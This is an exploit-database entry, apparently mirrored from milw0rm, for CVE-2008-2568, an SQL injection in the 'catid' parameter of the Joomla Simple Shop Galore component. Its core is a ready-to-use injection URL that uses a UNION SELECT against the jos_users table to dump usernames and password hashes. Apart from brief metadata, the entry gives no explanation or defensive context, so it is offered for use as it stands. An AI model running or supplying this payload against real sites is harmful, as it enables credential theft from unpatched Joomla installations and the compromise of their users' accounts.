[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection

Author: eXeCuTeR
type: webapps
platform: php
port: 
date_added: 2008-06-15 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-45963;CVE-2008-2568 
tags: 
aliases:  
screenshot_url:  
application_url: 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection

------------------------------------------------------

@ AUTHOR: eXeCuTeR <executerx[at]gmail[dot]com>

------------------------------------------------------

@ HOME: milw0rm.com

------------------------------------------------------

@ DORK: :\

------------------------------------------------------

@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
					~EOF~

side note:

same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it.  Original author: eXeCuTeR.

# milw0rm.com [2008-06-16]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.